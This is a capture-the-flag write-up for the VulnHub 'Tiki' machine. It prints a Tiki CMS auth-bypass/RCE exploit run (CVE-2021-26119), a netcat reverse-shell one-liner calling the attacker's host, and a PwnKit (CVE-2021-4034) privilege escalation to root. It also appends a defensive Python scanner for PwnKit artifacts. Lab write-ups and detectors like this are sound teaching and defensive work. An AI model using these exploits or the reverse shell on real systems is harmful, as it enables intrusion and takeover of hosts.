vulnhub-Tiki
Date: 07/14/2022
Difficulty: Easy
Tags: CVE-2021-26119, CVE-2021-4034, Tiki CMS, sudo -l
https://www.vulnhub.com/entry/tiki_1,525/
Information gathering
Port scan
Directory scan
➜ ~ dirsearch -u http://192.168.31.138
[06:15:28] Starting:
[06:15:30] 403 - 279B - /.ht_wsr.txt
[06:15:30] 403 - 279B - /.htaccess.orig
[06:15:30] 403 - 279B - /.htaccess.bak1
[06:15:30] 403 - 279B - /.htaccessBAK
[06:15:30] 403 - 279B - /.htaccess_sc
[06:15:30] 403 - 279B - /.htaccess.save
[06:15:30] 403 - 279B - /.htaccess.sample
[06:15:30] 403 - 279B - /.htaccessOLD
[06:15:30] 403 - 279B - /.htaccess_orig
[06:15:30] 403 - 279B - /.htaccessOLD2
[06:15:30] 403 - 279B - /.html
[06:15:30] 403 - 279B - /.htpasswds
[06:15:30] 403 - 279B - /.htm
[06:15:30] 403 - 279B - /.htpasswd_test
[06:15:30] 403 - 279B - /.httr-oauth
[06:15:31] 403 - 279B - /.php
[06:15:31] 403 - 279B - /.htaccess_extra
[06:15:59] 200 - 11KB - /index.html
[06:16:11] 200 - 42B - /robots.txt
[06:16:11] 403 - 279B - /server-status
[06:16:11] 403 - 279B - /server-status/
[06:16:16] 200 - 526B - /tiki/doc/stable.version
Found in robots.txt:
Adding that path and scanning again gives the version information:
http://192.168.31.138/tiki/changelog.txt
Method 1
In 2022 a new vulnerability for Tiki CMS came out, so it can be exploited with a single command:
https://srcincite.io/pocs/cve-2021-26119.py.txt
Verification
➜ Tiki python3 exp.py 192.168.31.138 /tiki id
(+) blanking password...
(+) admin password blanked!
(+) getting a session...
(+) auth bypass successful!
(+) triggering rce...
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Reverse shell
➜ Tiki python3 exp.py 192.168.31.138 /tiki "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.31.134 1234 >/tmp/f"
(+) blanking password...
(+) admin password blanked!
(+) getting a session...
(+) auth bypass successful!
(+) triggering rce...
Privilege escalation
git clone https://github.com/berdav/CVE-2021-4034.git
python3 -m http.server 80
wget 192.168.31.134/cve-2021-4034.c
wget 192.168.31.134/Makefile
wget 192.168.31.134/pwnkit.c
wget 192.168.31.134/pwnkit.so
www-data@ubuntu:/tmp$ make
make
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /usr/bin/true GCONV_PATH=./pwnkit.so:.
www-data@ubuntu:/tmp$ ls
ls
CVE-2021-4034.git cve-2021-4034 gconv-modules pwnkit.so
'GCONV_PATH=.' cve-2021-4034.c linpeas.sh pwnkit.so.1
Makefile f pwnkit.c
www-data@ubuntu:/tmp$ ./cve-2021-4034
./cve-2021-4034
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
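As an added defender-side example (not part of the original writeup), the following Python script scans scratch directories for the artifacts the PwnKit build above leaves behind: the gconv-modules file registering a fake module, the directory named GCONV_PATH=., and the pwnkit.so library. The directory it scans is a constructed fixture built in a temp dir; function and file names are assumptions of this example.

```python
import re
import tempfile
from pathlib import Path

# The Makefile output above writes a gconv-modules file registering a fake
# "PWNKIT" module, a directory literally named "GCONV_PATH=.", and the
# payload library pwnkit.so next to the exploit binary.
GCONV_MODULE_LINE = re.compile(r"^\s*module\s+\S+\s+\S+\s+(\S+)\s+\d+", re.M)


def scan_for_pwnkit_artifacts(roots: list[str]) -> list[dict]:
    """Walk each root and report PwnKit build artifacts found below it."""
    findings = []
    for root in roots:
        root_path = Path(root)
        if not root_path.is_dir():
            continue  # e.g. a scratch directory that does not exist on this host
        for entry in root_path.rglob("*"):
            name = entry.name
            if entry.is_dir() and name.startswith("GCONV_PATH="):
                findings.append({"path": str(entry), "type": "gconv_path_dir"})
            elif entry.is_file() and name == "gconv-modules":
                # glibc only honours a gconv-modules file outside its own gconv
                # directory via GCONV_PATH, which is what the exploit relies on.
                m = GCONV_MODULE_LINE.search(entry.read_text(errors="replace"))
                findings.append({"path": str(entry), "type": "gconv_modules_file",
                                 "module": m.group(1) if m else None})
            elif entry.is_file() and name.startswith("pwnkit.so"):
                findings.append({"path": str(entry), "type": "shared_object"})
    return sorted(findings, key=lambda f: f["path"])


def build_constructed_fixture() -> str:
    """Constructed temp directory mirroring the /tmp listing in the writeup."""
    base = Path(tempfile.mkdtemp(prefix="pwnkit-demo-"))
    (base / "GCONV_PATH=.").mkdir()
    (base / "gconv-modules").write_text("module UTF-8// PWNKIT// pwnkit 1\n")
    (base / "pwnkit.so").write_bytes(b"")  # empty stand-in, not a real library
    (base / "linpeas.sh").write_text("#!/bin/sh\n")  # benign: must not match
    return str(base)


def demo() -> list[dict]:
    """Scan the constructed fixture plus a path that does not exist."""
    return scan_for_pwnkit_artifacts([build_constructed_fixture(), "/nonexistent"])
```

Point the scan at world-writable locations such as /tmp and /dev/shm on a live host; a hit on any of the three artifact types is worth triage even after the exploit binary itself has been removed.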
Method 2
➜ ~ searchsploit tiki 21
----------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------- ---------------------------------
Tiki Wiki CMS Groupware 21.1 - Authentication Bypass | php/webapps/48927.py
----------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Run the script; after logging in through Burp, use the cookie to log in on the web page and obtain the account credentials.
sudo su gives root.